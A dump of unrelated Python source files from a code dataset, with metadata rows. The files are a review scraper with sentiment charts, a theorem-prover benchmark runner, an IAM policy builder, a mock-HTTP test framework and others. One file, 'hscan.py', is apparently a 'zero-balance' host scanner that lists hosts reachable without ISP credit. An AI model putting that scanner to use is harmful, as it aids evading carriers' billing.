os.system("clear")
print(green + banner + reset)
print(green + "[1]" + reset + "Dialog")
print(green + "[2]" + reset + "Mobitel")
print(green + "[3]" + reset + "Airtel")
while True:
try:
isp = int(input(yellow + "Please select your ISP " + green + ">>>" + reset))
if 0 < isp <= 3:
break
else:
print(red+"Invalid value, please try agein!!"+reset)
continue
except:
print(red+"Invalid value, please try agein!!"+reset)
continue
isp_selfcare = ""
if isp == 1:
isp_selfcare = "www.dialog.lk"
elif isp == 2:
isp_selfcare = "202.129.235.210"
elif isp == 3:
isp_selfcare = "staysafe.gov.lk"
else:
isp_selfcare = "none"
pms = False
host_list = []
try :
requests.post(f"http://{isp_selfcare}", timeout=2)
pms = True
except:
pms = False
print(red + "OOPs...Your internet connection is not stable, Please Try agein!" + reset)
if pms == True:
while True:
try:
ask_host_list = input(yellow + "Enter host list " + green + ">>>" + reset)
h_list = open(str(ask_host_list), "r")
new_file = input(yellow + "Enter name of output file " + green + ">>>" + reset)
break
except:
print(red + "Please check your host list and try agein!" + reset)
continue
for x in h_list:
try:
requests.post(f"http://{x.strip()}", timeout=5)
host_list.append(x)
except:
pass
with open(f"{new_file}.txt", "w+") as file1:
for x in host_list:
file1.writelines(x)
print(green + "done" + reset)
else:
print("Fuck")
| Nadeesha-Prasad/Zero-Balance-Host-Scanner-For-Linux | hscan.py | hscan.py | py | 2,271 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "colorama.Fore.GREEN",
"line_number": 3,
"usage_type": "attribute"
},
{
"api_name": "colorama.Fore",
"line_number": 3,
"usage_type": "name"
},
{
"api_name": "colorama.Fore.RED",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "colorama.F... |
21417420352 | import pandas as pd
import numpy as np
import requests
from textblob import TextBlob as tb
from bs4 import BeautifulSoup as bs
from matplotlib import pyplot as plt
import time
import nltk
import re
from IPython.display import clear_output
import matplotlib.pyplot as plt
import seaborn as sns
stopwords = nltk.corpus.stopwords.words("english")
def ruku_likn_de(url , pg = 20):
if url[12:12+6] == "amazon":
print("Amazon Link Detected")
return find_amazon_data_ruku(url , pg)
else:
print("FLipkart Link Detected")
return find_Flip_data_ruku(url , pg)
def mood(t):
mood = tb(t).sentiment.polarity
if mood > 0:
return "Happy"
elif mood == 0:
return "No Mood"
else:
return "Sad"
#Amazon Website
def find_amazon_data_ruku(link , pg = 10 ):
raw = link
last = pg
code = 0
review = []
for p in range(1,last+1):
num = raw.find("ref")
url_1 = raw[0:num]
url_2 = f"ref=cm_cr_arp_d_paging_btm_next_{p}?ie=UTF8&reviewerType=all_reviews&pageNumber={p}"
finalurl = url_1+url_2
finalurl = finalurl.replace("/dp/","/product-reviews/")
data = requests.get(finalurl)
print("amazon Link Detected")
if (data.reason) == "OK" :
code = code+1
data = bs(data.content ,"html.parser")
data = data.find_all(class_= "aok-relative")
print(int(p/last *100) , "% Completion")
print(int(code/last * 100) , "% Success Rate")
clear_output(wait=True)
for d in data:
d = {
"Rating" : float(d.find(class_="a-link-normal").text[0:3]),
"Title" : tb(d.find(class_="review-title-content").text).correct(),
"Content" : (d.find(class_="review-text-content").text),
"Polarity": mood(d.find(class_="review-text-content").text)
}
review.append(d)
print((code/last) * 100 ,"% is the Sucess rate")
data = pd.DataFrame(review)
data.replace("\n","",regex=True,inplace=True)
data["Polartiy"] = data["Content"].apply(mood)
for d in data.columns:
try:
data[d] = data[d].apply(low)
except:
pass
show_rating_bar(data)
show_pie_chart(data)
show_Sad_chart(data , n = 1)
show_Happy_chart(data, n = 1)
return review
#flipkart
def find_Flip_data_ruku(link , pg = 50):
raw = link
last = pg
code = 0
review = []
for p in range(1,last+1):
num = raw.find("&")
url_1 = raw[0:num+1]+f"page={p}"
url_1 = url_1.replace("/p/","/product-reviews/")
data = requests.get(url_1)
if (data.reason) == "OK" :
code = code+1
data = bs(data.content,"html.parser")
data = data.find_all(class_= "col _2wzgFH K0kLPL")
print(int(p/last *100) , "% Completion")
print(int(code/last * 100) , "% Sucess Rate")
clear_output(wait=True)
for d in data:
d = {
"Rating" : float(d.find(class_="_1BLPMq").text),
"Title" : d.find(class_="_2-N8zT").text,
"Content" : d.find(class_="t-ZTKy").text
}
review.append(d)
print((code/last) * 100 ,"% is the Sucess rate")
data = pd.DataFrame(review)
data.replace("\n","",regex=True,inplace=True)
def mood(t):
mood = tb(t).sentiment.polarity
if mood > 0:
return "Happy"
elif mood == 0:
return "No Mood"
else:
return "Sad"
data["Polartiy"] = data["Content"].apply(mood)
for d in data.columns:
try:
data[d] = data[d].apply(low)
except:
pass
show_rating_bar(data)
plt.close()
show_pie_chart(data)
plt.close()
show_Sad_chart(data , n = 2)
plt.close()
show_Happy_chart(data, n = 2)
plt.close()
return review
def low(text):
return text.lower()
def show_rating_bar(data):
rating = data.groupby(by="Rating")[["Title"]].count()
sns.barplot(y=rating.Title,x = rating.index)
plt.savefig("static/rate.png")
plt.clf()
# time.sleep(1)
def show_pie_chart(data):
try:
x = data.groupby(by="Polartiy")[["Content"]].count()
plt.pie(x = x.Content,autopct='%.2f',shadow=True,labels=x.index)
plt.savefig("static/pie.png")
plt.clf()
# time.sleep(1)
except:
pass
def show_Happy_chart(data, n = 1):
sad_data = data[data["Polartiy"] == "happy"]
words = []
for i in range(0,len(sad_data)):
a = data.Content[i]
a = re.sub("[', ),:,(,.,!,&,]"," ",a)
a = re.sub("[0-9]"," ",a)
a = " ".join(a.split())
a = nltk.word_tokenize(a)
a = nltk.ngrams(a,n)
for m in a:
if m not in stopwords:
words.append(m)
val = nltk.FreqDist(words).values()
key = nltk.FreqDist(words).keys()
data_1 = pd.DataFrame(data={"Key":key, "val": val})
data_1= data_1.sort_values(by = "val",ascending=False)[0:10]
plt.figure(figsize=(8,8))
sns.barplot(x = data_1.val, y = data_1.Key,orient="h")
plt.savefig("static/hapy.png")
plt.clf()
# time.sleep(1)
def show_Sad_chart(data , n = 1):
sad_data = data[data["Polartiy"] == "sad"]
words = []
for i in range(0,len(sad_data)):
a = data.Content[i]
a = re.sub("[', ),:,(,.,!,&,]"," ",a)
a = re.sub("[0-9]"," ",a)
a = " ".join(a.split())
a = nltk.word_tokenize(a)
a = nltk.ngrams(a,n)
for m in a:
if m not in stopwords:
words.append(m)
val = nltk.FreqDist(words).values()
key = nltk.FreqDist(words).keys()
data_1 = pd.DataFrame(data={"Key":key, "val": val})
data_1= data_1.sort_values(by = "val",ascending=False)[0:10]
sns.barplot(x = data_1.val, y = data_1.Key,orient="h")
plt.savefig("static/sad.png")
plt.clf()
# time.sleep(0)
def low(text):
return text.lower()
| Ruksana-Kauser/NLP_Final_Project | reviews.py | reviews.py | py | 6,211 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "nltk.corpus",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "textblob.TextBlob",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "reques... |
26009651155 | import argparse
import os
import random
import re
import subprocess
import time
parser = argparse.ArgumentParser()
parser.add_argument(
"-n", "--number", help="max number of problems to attempt", type=int
)
parser.add_argument(
"-r", "--random", help="attempt problems in random order", action="store_true"
)
parser.add_argument("-s", "--seed", help="random number seed", type=int)
parser.add_argument(
"-t", "--time", help="time limit per problem", type=float, default=60.0
)
parser.add_argument("files", nargs="*")
args = parser.parse_args()
if args.seed is not None:
args.random = 1
random.seed(args.seed)
if not args.files:
args.files = ["tptp"]
tptp = os.getenv("TPTP")
if not tptp:
raise Exception("TPTP environment variable not set")
problems = []
for arg in args.files:
if arg.lower() == "tptp":
arg = tptp
elif re.match(r"[A-Za-z][A-Za-z][A-Za-z]$", arg):
arg = arg.upper()
arg = os.path.join(tptp, "Problems", arg)
elif re.match(r"[A-Za-z][A-Za-z][A-Za-z]\d\d\d.\d+$", arg):
arg = arg.upper()
arg = os.path.join(tptp, "Problems", arg[:3], arg + ".p")
if os.path.isdir(arg):
for root, dirs, files in os.walk(arg):
for file in files:
ext = os.path.splitext(file)[1]
if ext == ".p" and "^" not in file and "_" not in file:
problems.append(os.path.join(root, file))
continue
if arg.endswith(".lst"):
for s in open(arg):
if "^" not in s:
problems.append(s.rstrip())
continue
problems.append(arg)
if args.random:
random.shuffle(problems)
if args.number:
problems = problems[0 : args.number]
def difficulty(file):
for s in open(file):
m = re.match(r"% Rating : (\d+\.\d+)", s)
if m:
return m[1]
return "?"
for file in problems:
print(os.path.basename(file), end="\t")
print(difficulty(file), end="\t", flush=True)
# --auto makes a big difference to performance
# don't use --auto-schedule
# for some reason, it breaks the subprocess timeout feature
cmd = "bin/eprover", "--auto", "-p", file
t = time.time()
try:
p = subprocess.run(
cmd, capture_output=True, encoding="utf-8", timeout=args.time
)
# if p.returncode == 3:
# print()
# continue
if p.returncode not in (0, 1, 9):
raise Exception(p.returncode)
print("%0.3f" % (time.time() - t), end="\t")
print(len(p.stdout.splitlines()), end="\t")
m = re.search(r"SZS status (\w+)", p.stdout)
r = m[1]
except subprocess.TimeoutExpired:
print("%0.3f" % (time.time() - t), end="\t")
print(0, end="\t")
r = "Timeout"
print(r)
| russellw/ayane | script/e.py | e.py | py | 2,820 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "random.seed",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "re.match",
"line_num... |
33052012137 | from sqlalchemy.orm import Session
import curd, cloud, orm
def policy_with_projects(yun, projects):
if not projects or len(projects) == 0:
return None
tagvals = ','.join(['"'+p.project.name+'"' for p in projects])
return yun.CloudIAM.policy_gen_write_with_tag("Project", tagvals)
def policy_with_teams(yun, teams):
if not teams or len(teams) == 0:
return None
tagvals = ','.join(['"'+p.team.name+'"' for p in teams])
return yun.CloudIAM.policy_gen_write_with_tag("Team", tagvals)
def policy_with_repos_read(yun, repos):
if not repos or len(repos) == 0:
return None
arns = ','.join(['"'+p.repo.arn+'"' for p in repos])
return yun.CloudIAM.get_by_user_read(arns)
def policy_with_repos_write(yun, repos):
if not repos or len(repos) == 0:
return None
arns = ','.join(['"'+p.repo.arn+'"' for p in repos])
return yun.CloudIAM.get_by_user_write(arns)
def update_user_policy(db: Session, user: orm.User, newly=False):
actions = []
name = user.name
projects = curd.ProjectAdmin.get_all_by_user(db, user.id)
teams = curd.TeamAdmin.get_all_by_user(db, user.id)
repos_read = curd.Perm.get_by_user_read(db, user.id)
repos_write = curd.Perm.get_by_user_write(db, user.id)
yun = cloud.get()
projectpolicy = policy_with_projects(yun, projects)
if projectpolicy:
actions.append(projectpolicy)
teampolicy = policy_with_teams(yun, teams)
if teampolicy:
actions.append(teampolicy)
readpolicy = policy_with_repos_read(yun, repos_read)
if readpolicy:
actions.append(readpolicy)
writepolicy = policy_with_repos_write(yun, repos_write)
if writepolicy:
actions.append(writepolicy)
rules = ','.join(actions)
policy = '{"Version": "2012-10-17","Statement": {['+rules+']}}'
if newly:
return yun.CloudIAM.policy_create(name, policy)
else:
return yun.CloudIAM.policy_update(user.ccpolicy, policy)
def refresh_policy_with_uid(db: Session, userid: int):
user = curd.User.get(db, userid)
return update_user_policy(db, user)
def refresh_policy_with_uname(db: Session, username: str):
user = curd.User.get_by_name(db, username)
return update_user_policy(db, user)
| kealiu/codecommitter | app/iam.py | iam.py | py | 2,267 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sqlalchemy.orm.Session",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "orm.User",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "curd.ProjectAdmin.get_all_by_user",
"line_number": 31,
"usage_type": "call"
},
{
"api_name":... |
40554209630 | """
Stack-In-A-Box: Stack Management
"""
import logging
import re
import threading
import uuid
import six
logger = logging.getLogger(__name__)
class ServiceAlreadyRegisteredError(Exception):
"""StackInABoxService with the same name already registered."""
pass
class StackInABox(object):
"""Stack-In-A-Box Testing Service.
StackInABox provides a testing framework for RESTful APIs
The framework provides a thread-local instance holding the
StackInABoxService objects that are representing the
RESTful APIs.
The StackInABox object provides a means of accessing it
from anywhere in a thread; however, it is not necessarily
thread-safe at this time. If one is careful o setup StackInABox
and write StackInABoxService's that are thread-safe
themselves, then there is no reason it could not be used in a
multi-threaded or multi-processed test.
"""
@classmethod
def get_thread_instance(cls):
"""
Interface to the thread storage to ensure the instance properly exists
"""
create = False
# if the `instance` property doesn't exist
if not hasattr(local_store, 'instance'):
local_store.instance = None
create = True
# if the instance doesn't exist at all
elif local_store.instance is None:
create = True
# if it's something else entirely...
elif not isinstance(local_store.instance, cls):
local_store.instance = None
create = True
# if the above conditions are met, create it
if create:
logger.debug('Creating new StackInABox instance...')
local_store.instance = cls()
logger.debug(
'Created StackInABox({0})'.format(local_store.instance.__id)
)
return local_store.instance
@classmethod
def reset_services(cls):
"""Reset the thread's StackInABox instance."""
logger.debug('Resetting services')
return cls.get_thread_instance().reset()
@classmethod
def register_service(cls, service):
"""Add a service to the thread's StackInABox instance.
:param service: StackInABoxService instance to add to the test
For return value and errors see StackInABox.register()
"""
logger.debug('Registering service {0}'.format(service.name))
return cls.get_thread_instance().register(service)
@classmethod
def call_into(cls, method, request, uri, headers):
"""Make a call into the thread's StackInABox instance.
:param method: HTTP Method (e.g GET, POST)
:param request: a Request object containing the request data
:param uri: the URI of the request submitted with the method
:param headers: the return headers in a Case-Insensitive dict
For return value and errors see StackInABox.call()
"""
logger.debug('Request: {0} - {1}'.format(method, uri))
return cls.get_thread_instance().call(method,
request,
uri,
headers)
@classmethod
def hold_onto(cls, name, obj):
"""Add data into the a storage area provided by the framework.
Note: The data is stored with the thread local instance.
:param name: name of the data to be stored
:param obj: data to be stored
For return value and errors see StackInABox.into_hold()
"""
logger.debug('Holding on {0} of type {1} with id {2}'
.format(name, type(obj), id(obj)))
cls.get_thread_instance().into_hold(name, obj)
@classmethod
def hold_out(cls, name):
"""Get data from the storage area provided by the framework.
Note: The data is retrieved from the thread local instance.
:param name: name of the data to be retrieved
:returns: The data associated with the specified name.
For errors see StackInABox.from_hold()
"""
logger.debug('Retreiving {0} from hold'
.format(name))
obj = cls.get_thread_instance().from_hold(name)
logger.debug('Retrieved {0} of type {1} with id {2} from hold'
.format(name, type(obj), id(obj)))
return obj
@classmethod
def update_uri(cls, uri):
"""Set the URI of the StackInABox framework.
:param uri: the base URI used to match the service.
"""
logger.debug('Request: Update URI to {0}'.format(uri))
cls.get_thread_instance().base_url = uri
def __init__(self):
"""Initialize the StackInABox instance.
Default Base URI is '/'.
There are no services registered, and the storage hold
is a basic dictionary object used as a key-value store.
"""
self.__id = uuid.uuid4()
self.__base_url = '/'
self.services = {
}
self.holds = {
}
@staticmethod
def __get_service_url(base_url, service_name):
"""Get the URI for a given StackInABoxService.
Note: this is an internal function
:param base_url: base URL to use
:param service_name: name of the service the URI is for
"""
return '{0}/{1}'.format(base_url, service_name)
@staticmethod
def get_services_url(url, base_url):
"""Get the URI from a given URL.
:returns: URI within the URL
"""
length = len(base_url)
checks = ['http://', 'https://']
for check in checks:
if url.startswith(check):
length = length + len(check)
break
result = url[length:]
logger.debug('{0} from {1} equals {2}'
.format(base_url, url, result))
return result
@property
def base_url(self):
"""Base URL property."""
return self.__base_url
@base_url.setter
def base_url(self, value):
"""Set the Base URL property, updating all associated services."""
logger.debug('StackInABox({0}): Updating URL from {1} to {2}'
.format(self.__id, self.__base_url, value))
self.__base_url = value
for k, v in six.iteritems(self.services):
matcher, service = v
service.base_url = StackInABox.__get_service_url(value,
service.name)
logger.debug('StackInABox({0}): Service {1} has url {2}'
.format(self.__id, service.name, service.base_url))
def reset(self):
"""Reset StackInABox to a like-new state."""
logger.debug('StackInABox({0}): Resetting...'
.format(self.__id))
for k, v in six.iteritems(self.services):
matcher, service = v
logger.debug('StackInABox({0}): Resetting Service {1}'
.format(self.__id, service.name))
service.reset()
self.services = {}
self.holds = {}
logger.debug('StackInABox({0}): Reset Complete'
.format(self.__id))
def register(self, service):
"""Add a service to the thread's StackInABox instance.
:param service: StackInABoxService instance to add to the test
:returns: None
:raises: ServiceAlreadyRegisteredError if the service already exists
"""
if service.name not in self.services.keys():
logger.debug('StackInABox({0}): Registering Service {1}'
.format(self.__id, service.name))
regex = '^/{0}/'.format(service.name)
self.services[service.name] = [
re.compile(regex),
service
]
service.base_url = StackInABox.__get_service_url(self.base_url,
service.name)
logger.debug('StackInABox({0}): Service {1} has url {2}'
.format(self.__id, service.name, service.base_url))
else:
raise ServiceAlreadyRegisteredError(
'Service {0} is already registered'.format(service.name))
def call(self, method, request, uri, headers):
"""Make a call into the thread's StackInABox instance.
:param method: HTTP Method (e.g GET, POST)
:param request: a Request object containing the request data
:param uri: the URI of the request submitted with the method
:param headers: the return headers in a Case-Insensitive dict
:returns: A tuple containing - (i) the Status Code, (ii) the response
headers, and (iii) the response body data
This function should not emit any Exceptions
"""
logger.debug('StackInABox({0}): Received call to {1} - {2}'
.format(self.__id, method, uri))
service_uri = StackInABox.get_services_url(uri, self.base_url)
for k, v in six.iteritems(self.services):
matcher, service = v
logger.debug('StackInABox({0}): Checking if Service {1} handles...'
.format(self.__id, service.name))
logger.debug('StackInABox({0}): ...using regex pattern {1} '
'against {2}'
.format(self.__id, matcher.pattern, service_uri))
if matcher.match(service_uri):
logger.debug('StackInABox({0}): Trying Service {1} handler...'
.format(self.__id, service.name))
try:
service_caller_uri = service_uri[(len(service.name) + 1):]
return service.request(method,
request,
service_caller_uri,
headers)
except Exception as ex:
logger.exception('StackInABox({0}): Service {1} - '
'Internal Failure'
.format(self.__id, service.name))
return (596,
headers,
'Service Handler had an error: {0}'.format(ex))
return (597, headers, 'Unknown service - {0}'.format(service_uri))
def into_hold(self, name, obj):
"""Add data into the a storage area provided by the framework.
Note: The data is stored with the thread local instance.
:param name: name of the data to be stored
:param obj: data to be stored
:returns: N/A
:raises: N/A
"""
logger.debug('StackInABox({0}): Holding onto {1} of type {2} '
'with id {3}'
.format(self.__id, name, type(obj), id(obj)))
self.holds[name] = obj
def from_hold(self, name):
"""Get data from the storage area provided by the framework.
Note: The data is retrieved from the thread local instance.
:param name: name of the data to be retrieved
:returns: The data associated with the specified name.
:raises: Lookup/KeyError error if the name does not match
a value in the storage
"""
logger.debug('StackInABox({0}): Retreiving {1} from the hold'
.format(self.__id, name))
obj = self.holds[name]
logger.debug('StackInABox({0}): Retrieved {1} of type {2} with id {3}'
.format(self.__id, name, type(obj), id(obj)))
return obj
# Thread local instance of StackInABox
local_store = threading.local()
| TestInABox/stackInABox | stackinabox/stack.py | stack.py | py | 11,760 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "uuid.uuid4",
"line_number": 160,
"usage_type": "call"
},
{
"api_name": "six.iteritems",
"line_number": 209,
"usage_type": "call"
},
{
"api_name": "six.iteritems",
"lin... |
36570577773 | from haystack.forms import SearchForm
from django import forms
from haystack.query import SearchQuerySet
from haystack.query import SQ
from peeldb.models import City
valid_time_formats = ["%Y-%m-%d 00:00:00"]
class job_searchForm(SearchForm):
q = forms.CharField(max_length=200, required=False)
location = forms.CharField(required=False)
experience = forms.IntegerField(required=False)
salary = forms.IntegerField(required=False)
job_type = forms.CharField(required=False)
industry = forms.CharField(required=False)
functional_area = forms.CharField(required=False)
walkin_from_date = forms.DateField(required=False)
walkin_to_date = forms.DateField(required=False)
walkin_type = forms.CharField(required=False)
refine_location = forms.CharField(required=False)
def search(self):
# sqs = SearchQuerySet().models(JobPost).filter(status='Live')
sqs = SearchQuerySet()
sqs = sqs.filter_and(status="Live")
if not self.is_valid():
return sqs
if self.cleaned_data["q"] and self.cleaned_data["location"]:
term = self.cleaned_data["q"]
term = term.replace("[", "")
term = term.replace("]", "")
term = term.replace("'", "")
# sqs = sqs.filter_and(SQ(title=term) | SQ(designation=term)| SQ(skills=term))
terms = [t.strip() for t in term.split(",")]
sqs = sqs.filter_and(
SQ(title__in=terms) | SQ(designation__in=terms) | SQ(skills__in=terms)
)
# sqs = sqs.filter_or(SQ(designation__in=terms))
# sqs = sqs.filter_or(SQ(skills__in=terms))
location = self.cleaned_data["location"]
location = location.replace("[", "")
location = location.replace("]", "")
location = location.replace("'", "")
locations = [t.strip() for t in location.split(",")]
other_cities = City.objects.filter(name__in=locations).values_list(
"parent_city__name", flat=True
)
sqs = sqs.filter_and(
SQ(location__in=locations)
| SQ(location__startswith=self.cleaned_data["location"])
| SQ(location__in=other_cities)
)
if self.cleaned_data["job_type"]:
sqs = sqs.filter_and(job_type=self.cleaned_data["job_type"])
if self.cleaned_data["industry"]:
term = self.cleaned_data["industry"]
# sqs = sqs.filter_and(SQ(title=term) | SQ(designation=term)| SQ(skills=term))
terms = [t.strip() for t in term.split(",")]
sqs = sqs.filter_or(industry__in=terms)
if self.cleaned_data["functional_area"]:
term = self.cleaned_data["functional_area"]
# sqs = sqs.filter_and(SQ(title=term) | SQ(designation=term)| SQ(skills=term))
terms = [t.strip() for t in term.split(",")]
sqs = sqs.filter_or(functional_area__in=terms)
if self.cleaned_data["experience"] or self.cleaned_data["experience"] == 0:
sqs = sqs.filter_or(
SQ(max_experience__gte=self.cleaned_data["experience"])
& SQ(min_experience__lte=self.cleaned_data["experience"])
)
if self.cleaned_data["salary"]:
sqs = sqs.filter_or(
SQ(max_salary__gte=self.cleaned_data["salary"])
& SQ(min_salary__lte=self.cleaned_data["salary"])
)
if self.cleaned_data["walkin_type"]:
import datetime
if self.cleaned_data["walkin_type"] == "this_week":
date = datetime.date.today()
start_week = (
date
- datetime.timedelta(date.weekday())
- datetime.timedelta(1)
)
end_week = start_week + datetime.timedelta(6)
start_week = datetime.datetime.strptime(
str(start_week), "%Y-%m-%d"
).strftime("%Y-%m-%d")
end_week = datetime.datetime.strptime(
str(end_week), "%Y-%m-%d"
).strftime("%Y-%m-%d")
sqs = sqs.filter_and(
SQ(walkin_from_date__range=[start_week, end_week])
| SQ(walkin_to_date__range=[start_week, end_week])
)
if self.cleaned_data["walkin_type"] == "next_week":
date = datetime.date.today()
start_week = (
date
- datetime.timedelta(date.isoweekday())
+ datetime.timedelta(7)
)
end_week = start_week + datetime.timedelta(6)
start_week = datetime.datetime.strptime(
str(start_week), "%Y-%m-%d"
).strftime("%Y-%m-%d")
end_week = datetime.datetime.strptime(
str(end_week), "%Y-%m-%d"
).strftime("%Y-%m-%d")
sqs = sqs.filter_and(
SQ(walkin_from_date__range=[start_week, end_week])
| SQ(walkin_to_date__range=[start_week, end_week])
)
# sqs = sqs.filter_and(SQ(walkin_from_date__range=[start_week, end_week]) | SQ(walkin_to_date__range=[start_week, end_week]))
if self.cleaned_data["walkin_type"] == "this_month":
current_date = datetime.date.today()
from dateutil.relativedelta import relativedelta
from datetime import date
start_week = date(current_date.year, current_date.month, 1)
end_week = start_week + relativedelta(day=31)
start_week = datetime.datetime.strptime(
str(start_week), "%Y-%m-%d"
).strftime("%Y-%m-%d")
end_week = datetime.datetime.strptime(
str(end_week), "%Y-%m-%d"
).strftime("%Y-%m-%d")
sqs = sqs.filter_and(
SQ(walkin_from_date__range=[start_week, end_week])
| SQ(walkin_to_date__range=[start_week, end_week])
)
# if self.cleaned_data['walkin_type'] == 'next_month':
# pass
if self.cleaned_data["walkin_type"] == "custom_range":
if self.cleaned_data["walkin_from_date"]:
walkin_from_date = datetime.datetime.strptime(
str(self.cleaned_data["walkin_from_date"]), "%Y-%m-%d"
).strftime("%Y-%m-%d")
sqs = sqs.filter_and(
SQ(walkin_from_date__gte=walkin_from_date)
| SQ(walkin_to_date__gte=walkin_from_date)
)
if self.cleaned_data["walkin_to_date"]:
walkin_to_date = datetime.datetime.strptime(
str(self.cleaned_data["walkin_to_date"]), "%Y-%m-%d"
).strftime("%Y-%m-%d")
sqs = sqs.filter_and(
SQ(walkin_from_date__gte=walkin_to_date)
| SQ(walkin_to_date__lte=walkin_to_date)
)
return sqs
else:
return []
def query(self):
if self.cleaned_data["q"]:
return self.cleaned_data["q"]
return None
# 13-11-2014
# 20-11-2014 29-11-2014
| MicroPyramid/opensource-job-portal | search/forms.py | forms.py | py | 7,863 | python | en | code | 336 | github-code | 36 | [
{
"api_name": "haystack.forms.SearchForm",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "django.forms.CharField",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.forms",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "django.... |
16132606164 | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 18 10:01:52 2020
@author: Ferhat
"""
from flask import Flask, jsonify, json, Response,make_response,request
from flask_cors import CORS
# =============================================================================
# from flask_cors import cross_origin
# =============================================================================
import numpy as np
import cv2
#from flask.ext.httpauth import HTTPBasicAuth
# =============================================================================
# from luminoso_api import LuminosoClient
# from luminoso_api.errors import LuminosoError, LuminosoClientError
# from luminoso_api.json_stream import open_json_or_csv_somehow
# from werkzeug.datastructures import ImmutableMultiDict
# =============================================================================
import logging
import random
app = Flask(__name__, static_url_path = "")
CORS(app)
file_handler = logging.FileHandler('app.log')
app.logger.addHandler(file_handler)
app.logger.setLevel(logging.INFO)
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def return_img(new_img,name):
random_value = random.randrange(1000)
path1 ='newImage'+str(random_value)+'.png'
path2 = 'C:/xampp/htdocs/python/'+path1
cv2.imwrite(path2,new_img)
data = {
'imgNew' : path1,
'desc' : name
}
return data
def convol(img):
kernel = np.ones((5,5),np.float32)/25
dst = cv2.filter2D(img,-1,kernel)
return return_img(dst,"Convolution")
def averaging(img):
blur = cv2.blur(img,(5,5))
return return_img(blur,"Averaging")
def gaus_filter(img):
blur = cv2.GaussianBlur(img,(5,5),0)
return return_img(blur,"Gaussian Filtering")
def median(img):
median = cv2.medianBlur(img,5)
return return_img(median,"Median Filtering")
def bilateral(img):
blur = cv2.bilateralFilter(img,9,75,75)
return return_img(blur,"Bilateral Filtering")
def binary(img):
ret,thresh_binary = cv2.threshold(img,127,255,cv2.THRESH_BINARY)
return return_img(thresh_binary,"THRESH_BINARY ")
def binary_inv(img):
ret,thresh_binary_inv= cv2.threshold(img,127,255,cv2.THRESH_BINARY_INV)
return return_img(thresh_binary_inv,"THRESH Binary Inv")
def tozero(img):
ret,thresh_tozero = cv2.threshold(img,127,255,cv2.THRESH_TOZERO)
return return_img(thresh_tozero,"THRESH Tozero")
def trunc(img):
ret,thresh_trunc = cv2.threshold(img,127,255,cv2.THRESH_TRUNC)
return return_img(thresh_trunc,"THRESH Trunc")
def trunc_inv(img):
ret,thresh_trunc_inv = cv2.threshold(img,127,255,cv2.THRESH_TOZERO_INV)
return return_img(thresh_trunc_inv,"THRESH Tozero Inv")
@app.errorhandler(400)
def not_found(error):
app.logger.error('Bad Request - 400')
return make_response(jsonify( { 'error': 'Bad request' } ), 400)
@app.route('/image_process', methods = ['GET','POST'])
def get_test():
img_Path = request.args.get('img_path')
img_type = request.args.get('img_type')
image = cv2.imread(img_Path,0)
if img_type == "convol":
data = convol(image)
elif img_type == "averaging":
data = averaging(image)
elif img_type == "gaus_filter":
data = gaus_filter(image)
elif img_type == "median":
data = median(image)
elif img_type == "bilateral":
data = bilateral(image)
elif img_type == "binary":
data = binary(image)
elif img_type == "binary_inv":
data = binary_inv(image)
elif img_type == "trunc":
data = trunc(image)
elif img_type == "tozero":
data = tozero(image)
elif img_type == "trunc_inv":
data = trunc_inv(image)
else:
data = return_img(image,"No Image")
js = json.dumps(data)
resp = Response(js, status=200, mimetype='application/json')
resp.headers['Link'] = 'https://localhost/python/'
return resp
# return "ECHO: GET\n"
if __name__ == "__main__":
app.run(debug=True)
| RamazanFerhatSonmez/Image-Processing-Python | rest-server.py | rest-server.py | py | 4,161 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "logging.FileHandler",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"l... |
15539017308 | from functools import reduce
from decimal import Decimal
# From stdin:
# num_of_elem=int(input())
# elements=list(map(int,input().split()))
# From a file:
num_of_elem=0
elements=""
with open('input/input03.txt','r') as file_in:
file_lines=file_in.readlines()
num_of_elem=int(file_lines[0])
elements=file_lines[1]
elements=list(map(int,elements.split()))
mean=Decimal(reduce(lambda x, y: x + y,elements)/num_of_elem)
oddNumber=num_of_elem %2 == 0
median=0
if not oddNumber :
median=elements[int((num_of_elem+1)/2)-1]
else:
elements.sort()
middle_left=elements[int(num_of_elem/2)-1]
middle_right=elements[int(num_of_elem/2)]
median=Decimal((middle_left+middle_right)/2.0)
elements_set=sorted(set(elements))
mode=None
mode_index_number=None
mode = count = elements.count(elements_set[0])
mode_index_number = elements_set[0]
for i in elements_set[1:len(elements_set)]:
count = elements.count(i)
if count > mode:
mode = count
mode_index_number = i
elif count == mode and i < mode_index_number:
mode_index_number = i
print(round(mean,1))
print(round(median,1))
print(mode_index_number) | gianv9/HackerRanksSubmissions | 10 Days of Statistics/Day 0/Mean Median and Mode/solution.py | solution.py | py | 1,156 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "decimal.Decimal",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "functools.reduce",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "decimal.Decimal",
"line_number": 27,
"usage_type": "call"
}
] |
28230488326 | from requests import Request, Session
import config
import json
__all__=['SendBookClass', 'SendFindClass']
config_FindClass = config.FindClass()
config_BookClass = config.BookClass()
http_proxy = "http://localhost:8888"
https_proxy = "https://localhost:8888"
